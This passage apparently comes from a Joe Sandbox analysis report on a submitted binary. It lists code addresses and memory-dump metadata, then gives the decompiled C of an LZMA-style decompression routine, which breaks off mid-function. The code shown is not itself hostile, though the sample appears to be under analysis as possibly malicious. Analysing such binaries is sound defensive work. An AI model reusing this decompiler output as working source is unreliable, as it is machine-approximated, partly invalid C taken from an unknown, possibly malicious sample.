                                                            0x004064d2
                                                            0x00406ada
                                                            0x00406ada
                                                            0x00000000
                                                            0x00406ada
                                                            0x004064d8
                                                            0x004064d8
                                                            0x004064db
                                                            0x004064de
                                                            0x004064e2
                                                            0x004064e5
                                                            0x004064eb
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064f0
                                                            0x004064f3
                                                            0x004064f3
                                                            0x004064f9
                                                            0x00406497
                                                            0x00406497
                                                            0x0040649a
                                                            0x00000000
                                                            0x0040649a
                                                            0x004064fb
                                                            0x004064fb
                                                            0x004064fe
                                                            0x00406501
                                                            0x00406504
                                                            0x00406507
                                                            0x0040650a
                                                            0x0040650d
                                                            0x00406510
                                                            0x00406513
                                                            0x00406516
                                                            0x00406519
                                                            0x00406531
                                                            0x00406534
                                                            0x00406537
                                                            0x0040653a
                                                            0x0040653a
                                                            0x0040653d
                                                            0x00406541
                                                            0x00406543
                                                            0x0040651b
                                                            0x0040651b
                                                            0x00406523
                                                            0x00406528
                                                            0x0040652a
                                                            0x0040652c
                                                            0x0040652c
                                                            0x00406546
                                                            0x0040654d
                                                            0x00406550
                                                            0x00000000
                                                            0x00406552
                                                            0x00406552
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x004067df
                                                            0x004067df
                                                            0x004067e3
                                                            0x00406b0a
                                                            0x00406b0a
                                                            0x00000000
                                                            0x00406b0a
                                                            0x004067e9
                                                            0x004067e9
                                                            0x004067ec
                                                            0x004067ef
                                                            0x004067f3
                                                            0x004067f6
                                                            0x004067fc
                                                            0x004067fe
                                                            0x004067fe
                                                            0x004067fe
                                                            0x00406801
                                                            0x00000000
                                                            0x00000000
                                                            0x004065af
                                                            0x004065af
                                                            0x004065b2
                                                            0x00000000
                                                            0x00000000
                                                            0x004068ee
                                                            0x004068ee
                                                            0x004068f2
                                                            0x00406914
                                                            0x00406914
                                                            0x00406917
                                                            0x00406921
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x004068f4
                                                            0x004068f4
                                                            0x004068f7
                                                            0x004068fb
                                                            0x004068fe
                                                            0x004068fe
                                                            0x00406901
                                                            0x00000000
                                                            0x00000000
                                                            0x004069ab
                                                            0x004069ab
                                                            0x004069af
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069d4
                                                            0x004069db
                                                            0x004069e2
                                                            0x004069e2
                                                            0x004069e9
                                                            0x004069ec
                                                            0x004069f3
                                                            0x00000000
                                                            0x004069f6
                                                            0x004069b1
                                                            0x004069b1
                                                            0x004069b4
                                                            0x004069b7
                                                            0x004069ba
                                                            0x004069c1
                                                            0x00406905
                                                            0x00406905
                                                            0x00406908
                                                            0x00000000
                                                            0x00000000
                                                            0x00406a9c
                                                            0x00406a9c
                                                            0x00406a9f
                                                            0x004069a0
                                                            0x004069a0
                                                            0x004069a0
                                                            0x00000000
                                                            0x004069a6
                                                            0x00000000
                                                            0x004066d6
                                                            0x004066d6
                                                            0x004066d8
                                                            0x004066df
                                                            0x004066e0
                                                            0x004066e2
                                                            0x004066e5
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004069e9
                                                            0x004069e9
                                                            0x004069ec
                                                            0x004069f3
                                                            0x00000000
                                                            0x004069f6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040671b
                                                            0x0040671b
                                                            0x0040671e
                                                            0x00406754
                                                            0x00406754
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406887
                                                            0x00406887
                                                            0x0040688a
                                                            0x0040688c
                                                            0x00406b16
                                                            0x00406b16
                                                            0x00000000
                                                            0x00406b16
                                                            0x00406892
                                                            0x00406892
                                                            0x00406895
                                                            0x00000000
                                                            0x00000000
                                                            0x0040689b
                                                            0x0040689b
                                                            0x0040689f
                                                            0x004068a2
                                                            0x004068a2
                                                            0x004068a2
                                                            0x00000000
                                                            0x004068a2
                                                            0x00406720
                                                            0x00406720
                                                            0x00406722
                                                            0x00406724
                                                            0x00406726
                                                            0x00406729
                                                            0x0040672a
                                                            0x0040672c
                                                            0x0040672e
                                                            0x00406731
                                                            0x00406734
                                                            0x0040674a
                                                            0x0040674a
                                                            0x0040674f
                                                            0x00406787
                                                            0x00406787
                                                            0x0040678b
                                                            0x004067b4
                                                            0x004067b7
                                                            0x004067b9
                                                            0x004067c0
                                                            0x004067c3
                                                            0x004067c6
                                                            0x004067c6
                                                            0x004067cb
                                                            0x004067cb
                                                            0x004067cd
                                                            0x004067d0
                                                            0x004067d7
                                                            0x004067da
                                                            0x00406807
                                                            0x00406807
                                                            0x0040680a
                                                            0x0040680d
                                                            0x00406881
                                                            0x00406881
                                                            0x00406881
                                                            0x00406881
                                                            0x00000000
                                                            0x00406881
                                                            0x0040680f
                                                            0x0040680f
                                                            0x00406815
                                                            0x00406818
                                                            0x0040681b
                                                            0x0040681e
                                                            0x00406821
                                                            0x00406824
                                                            0x00406827
                                                            0x0040682a
                                                            0x0040682d
                                                            0x00406830
                                                            0x00406849
                                                            0x0040684b
                                                            0x0040684e
                                                            0x0040684f
                                                            0x00406852
                                                            0x00406854
                                                            0x00406857
                                                            0x00406859
                                                            0x0040685b
                                                            0x0040685e
                                                            0x00406860
                                                            0x00406863
                                                            0x00406867
                                                            0x00406869
                                                            0x00406869
                                                            0x0040686a
                                                            0x0040686d
                                                            0x00406870
                                                            0x00406832
                                                            0x00406832
                                                            0x0040683a
                                                            0x0040683f
                                                            0x00406841
                                                            0x00406844
                                                            0x00406844
                                                            0x00406873
                                                            0x0040687a
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00000000
                                                            0x0040687c
                                                            0x0040687c
                                                            0x00000000
                                                            0x0040687c
                                                            0x0040687a
                                                            0x0040678d
                                                            0x0040678d
                                                            0x00406790
                                                            0x00406792
                                                            0x00406795
                                                            0x00406798
                                                            0x0040679b
                                                            0x0040679d
                                                            0x004067a0
                                                            0x004067a3
                                                            0x004067a3
                                                            0x004067a6
                                                            0x004067a6
                                                            0x004067a9
                                                            0x004067b0
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00000000
                                                            0x004067b2
                                                            0x004067b2
                                                            0x00000000
                                                            0x004067b2
                                                            0x004067b0
                                                            0x00406736
                                                            0x00406736
                                                            0x00406739
                                                            0x0040673b
                                                            0x0040673e
                                                            0x00000000
                                                            0x00000000
                                                            0x0040649d
                                                            0x0040649d
                                                            0x004064a1
                                                            0x00406ae6
                                                            0x00406ae6
                                                            0x00000000
                                                            0x00406ae6
                                                            0x004064a7
                                                            0x004064a7
                                                            0x004064aa
                                                            0x004064ad
                                                            0x004064b0
                                                            0x004064b3
                                                            0x004064b6
                                                            0x004064b9
                                                            0x004064bb
                                                            0x004064be
                                                            0x004064c1
                                                            0x004064c4
                                                            0x004064c6
                                                            0x004064c6
                                                            0x004064c6
                                                            0x00000000
                                                            0x00000000
                                                            0x00406628
                                                            0x00406628
                                                            0x0040662c
                                                            0x00406af2
                                                            0x00406af2
                                                            0x00000000
                                                            0x00406af2
                                                            0x00406632
                                                            0x00406632
                                                            0x00406635
                                                            0x00406638
                                                            0x0040663b
                                                            0x0040663d
                                                            0x0040663d
                                                            0x0040663d
                                                            0x00406640
                                                            0x00406643
                                                            0x00406646
                                                            0x00406649
                                                            0x0040664c
                                                            0x0040664f
                                                            0x00406650
                                                            0x00406652
                                                            0x00406652
                                                            0x00406652
                                                            0x00406655
                                                            0x00406658
                                                            0x0040665b
                                                            0x0040665e
                                                            0x0040665e
                                                            0x0040665e
                                                            0x00406661
                                                            0x00406663
                                                            0x00406663
                                                            0x00000000
                                                            0x00000000
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a9
                                                            0x00000000
                                                            0x00000000
                                                            0x004068af
                                                            0x004068af
                                                            0x004068b2
                                                            0x004068b5
                                                            0x004068b8
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068bd
                                                            0x004068c0
                                                            0x004068c3
                                                            0x004068c6
                                                            0x004068c9
                                                            0x004068cc
                                                            0x004068cd
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068d2
                                                            0x004068d5
                                                            0x004068d8
                                                            0x004068db
                                                            0x004068de
                                                            0x004068e2
                                                            0x004068e4
                                                            0x004068e7
                                                            0x00000000
                                                            0x004068e9
                                                            0x004068e9
                                                            0x00406666
                                                            0x00406666
                                                            0x00000000
                                                            0x00406666
                                                            0x004068e7
                                                            0x00406b1c
                                                            0x00406b1c
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b
                                                            0x00406b53
                                                            0x00406b53
                                                            0x00000000
                                                            0x00406b53
                                                            0x004069a0
                                                            0x00406a20
                                                            0x004069e9

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21de50892f659123e4fedba565e9e2413225c8e826dcfa90f57619bb85df476e
                                                            • Instruction ID: b3fba2513e78c155f0b266b50acf783dae1ce9585f0b47354f4c941ebe2136ae
                                                            • Opcode Fuzzy Hash: 21de50892f659123e4fedba565e9e2413225c8e826dcfa90f57619bb85df476e
                                                            • Instruction Fuzzy Hash: 76A13071E00229CBDF28CFA8C8447ADBBB1FB44305F15816AD816BB281D7789A96DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E004068EE() {
                                                            				void _t533;
                                                            				signed int _t534;
                                                            				signed int _t535;
                                                            				signed int* _t605;
                                                            				void* _t612;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					if( *(_t612 - 0x40) != 0) {
                                                            						 *(_t612 - 0x84) = 0x13;
                                                            						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                            						goto L132;
                                                            					} else {
                                                            						__eax =  *(__ebp - 0x4c);
                                                            						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            						__ecx =  *(__ebp - 0x58);
                                                            						__eax =  *(__ebp - 0x4c) << 4;
                                                            						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            						L130:
                                                            						 *(__ebp - 0x58) = __eax;
                                                            						 *(__ebp - 0x40) = 3;
                                                            						L144:
                                                            						 *(__ebp - 0x7c) = 0x14;
                                                            						L145:
                                                            						__eax =  *(__ebp - 0x40);
                                                            						 *(__ebp - 0x50) = 1;
                                                            						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                            						L149:
                                                            						if( *(__ebp - 0x48) <= 0) {
                                                            							__ecx =  *(__ebp - 0x40);
                                                            							__ebx =  *(__ebp - 0x50);
                                                            							0 = 1;
                                                            							__eax = 1 << __cl;
                                                            							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                            							__eax =  *(__ebp - 0x7c);
                                                            							 *(__ebp - 0x44) = __ebx;
                                                            							while(1) {
                                                            								L140:
                                                            								 *(_t612 - 0x88) = _t533;
                                                            								while(1) {
                                                            									L1:
                                                            									_t534 =  *(_t612 - 0x88);
                                                            									if(_t534 > 0x1c) {
                                                            										break;
                                                            									}
                                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00406B5B))) {
                                                            										case 0:
                                                            											if( *(_t612 - 0x6c) == 0) {
                                                            												goto L170;
                                                            											}
                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                            											_t534 =  *( *(_t612 - 0x70));
                                                            											if(_t534 > 0xe1) {
                                                            												goto L171;
                                                            											}
                                                            											_t538 = _t534 & 0x000000ff;
                                                            											_push(0x2d);
                                                            											asm("cdq");
                                                            											_pop(_t569);
                                                            											_push(9);
                                                            											_pop(_t570);
                                                            											_t608 = _t538 / _t569;
                                                            											_t540 = _t538 % _t569 & 0x000000ff;
                                                            											asm("cdq");
                                                            											_t603 = _t540 % _t570 & 0x000000ff;
                                                            											 *(_t612 - 0x3c) = _t603;
                                                            											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                            											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                            											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                            											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                            												L10:
                                                            												if(_t611 == 0) {
                                                            													L12:
                                                            													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                            													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                            													goto L15;
                                                            												} else {
                                                            													goto L11;
                                                            												}
                                                            												do {
                                                            													L11:
                                                            													_t611 = _t611 - 1;
                                                            													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                            												} while (_t611 != 0);
                                                            												goto L12;
                                                            											}
                                                            											if( *(_t612 - 4) != 0) {
                                                            												GlobalFree( *(_t612 - 4));
                                                            											}
                                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                            											 *(_t612 - 4) = _t534;
                                                            											if(_t534 == 0) {
                                                            												goto L171;
                                                            											} else {
                                                            												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                            												goto L10;
                                                            											}
                                                            										case 1:
                                                            											L13:
                                                            											__eflags =  *(_t612 - 0x6c);
                                                            											if( *(_t612 - 0x6c) == 0) {
                                                            												 *(_t612 - 0x88) = 1;
                                                            												goto L170;
                                                            											}
                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                            											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                            											_t45 = _t612 - 0x48;
                                                            											 *_t45 =  *(_t612 - 0x48) + 1;
                                                            											__eflags =  *_t45;
                                                            											L15:
                                                            											if( *(_t612 - 0x48) < 4) {
                                                            												goto L13;
                                                            											}
                                                            											_t546 =  *(_t612 - 0x40);
                                                            											if(_t546 ==  *(_t612 - 0x74)) {
                                                            												L20:
                                                            												 *(_t612 - 0x48) = 5;
                                                            												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                            												goto L23;
                                                            											}
                                                            											 *(_t612 - 0x74) = _t546;
                                                            											if( *(_t612 - 8) != 0) {
                                                            												GlobalFree( *(_t612 - 8));
                                                            											}
                                                            											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                            											 *(_t612 - 8) = _t534;
                                                            											if(_t534 == 0) {
                                                            												goto L171;
                                                            											} else {
                                                            												goto L20;
                                                            											}
                                                            										case 2:
                                                            											L24:
                                                            											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                            											 *(_t612 - 0x84) = 6;
                                                            											 *(_t612 - 0x4c) = _t553;
                                                            											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                            											goto L132;
                                                            										case 3:
                                                            											L21:
                                                            											__eflags =  *(_t612 - 0x6c);
                                                            											if( *(_t612 - 0x6c) == 0) {
                                                            												 *(_t612 - 0x88) = 3;
                                                            												goto L170;
                                                            											}
                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                            											_t67 = _t612 - 0x70;
                                                            											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                            											__eflags =  *_t67;
                                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                            											L23:
                                                            											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                            											if( *(_t612 - 0x48) != 0) {
                                                            												goto L21;
                                                            											}
                                                            											goto L24;
                                                            										case 4:
                                                            											L133:
                                                            											_t531 =  *_t605;
                                                            											_t588 = _t531 & 0x0000ffff;
                                                            											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                            											if( *(_t612 - 0xc) >= _t564) {
                                                            												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                            												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                            												 *(_t612 - 0x40) = 1;
                                                            												_t532 = _t531 - (_t531 >> 5);
                                                            												__eflags = _t532;
                                                            												 *_t605 = _t532;
                                                            											} else {
                                                            												 *(_t612 - 0x10) = _t564;
                                                            												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                            												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                            											}
                                                            											if( *(_t612 - 0x10) >= 0x1000000) {
                                                            												goto L139;
                                                            											} else {
                                                            												goto L137;
                                                            											}
                                                            										case 5:
                                                            											L137:
                                                            											if( *(_t612 - 0x6c) == 0) {
                                                            												 *(_t612 - 0x88) = 5;
                                                            												goto L170;
                                                            											}
                                                            											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                            											L139:
                                                            											_t533 =  *(_t612 - 0x84);
                                                            											goto L140;
                                                            										case 6:
                                                            											__edx = 0;
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x34) = 1;
                                                            												 *(__ebp - 0x84) = 7;
                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                            												goto L132;
                                                            											}
                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            											__esi =  *(__ebp - 0x60);
                                                            											__cl = 8;
                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            											__ecx =  *(__ebp - 0x3c);
                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            											__ecx =  *(__ebp - 4);
                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            											if( *(__ebp - 0x38) >= 4) {
                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                            													_t98 = __ebp - 0x38;
                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                            													__eflags =  *_t98;
                                                            												} else {
                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            												}
                                                            											} else {
                                                            												 *(__ebp - 0x38) = 0;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                            											if( *(__ebp - 0x34) == __edx) {
                                                            												__ebx = 0;
                                                            												__ebx = 1;
                                                            												goto L61;
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__ecx =  *(__ebp - 8);
                                                            												__ebx = 0;
                                                            												__ebx = 1;
                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            												goto L41;
                                                            											}
                                                            										case 7:
                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                            											if( *(__ebp - 0x40) != 1) {
                                                            												__eax =  *(__ebp - 0x24);
                                                            												 *(__ebp - 0x80) = 0x16;
                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            												__eax =  *(__ebp - 0x28);
                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            												__al = __al & 0x000000fd;
                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                            												__eax =  *(__ebp - 4);
                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                            												__eflags = __eax;
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												goto L69;
                                                            											}
                                                            											__eax =  *(__ebp - 4);
                                                            											__ecx =  *(__ebp - 0x38);
                                                            											 *(__ebp - 0x84) = 8;
                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                            											goto L132;
                                                            										case 8:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x84) = 0xa;
                                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x38);
                                                            												__ecx =  *(__ebp - 4);
                                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                                            												 *(__ebp - 0x84) = 9;
                                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                            											}
                                                            											goto L132;
                                                            										case 9:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												goto L90;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x60);
                                                            											if( *(__ebp - 0x60) == 0) {
                                                            												goto L171;
                                                            											}
                                                            											__eax = 0;
                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                            											__eflags = _t259;
                                                            											0 | _t259 = _t259 + _t259 + 9;
                                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                            											goto L76;
                                                            										case 0xa:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x84) = 0xb;
                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                            												goto L132;
                                                            											}
                                                            											__eax =  *(__ebp - 0x28);
                                                            											goto L89;
                                                            										case 0xb:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__ecx =  *(__ebp - 0x24);
                                                            												__eax =  *(__ebp - 0x20);
                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x24);
                                                            											}
                                                            											__ecx =  *(__ebp - 0x28);
                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            											L89:
                                                            											__ecx =  *(__ebp - 0x2c);
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            											L90:
                                                            											__eax =  *(__ebp - 4);
                                                            											 *(__ebp - 0x80) = 0x15;
                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                            											goto L69;
                                                            										case 0xc:
                                                            											L100:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xc;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t335 = __ebp - 0x70;
                                                            											 *_t335 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t335;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											__eax =  *(__ebp - 0x2c);
                                                            											goto L102;
                                                            										case 0xd:
                                                            											L37:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xd;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t122 = __ebp - 0x70;
                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t122;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L39:
                                                            											__eax =  *(__ebp - 0x40);
                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            												goto L48;
                                                            											}
                                                            											__eflags = __ebx - 0x100;
                                                            											if(__ebx >= 0x100) {
                                                            												goto L54;
                                                            											}
                                                            											L41:
                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            											 *(__ebp - 0x48) = __eax;
                                                            											__eax = __eax + 1;
                                                            											__eax = __eax << 8;
                                                            											__eax = __eax + __ebx;
                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            											__ax =  *__esi;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__edx = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
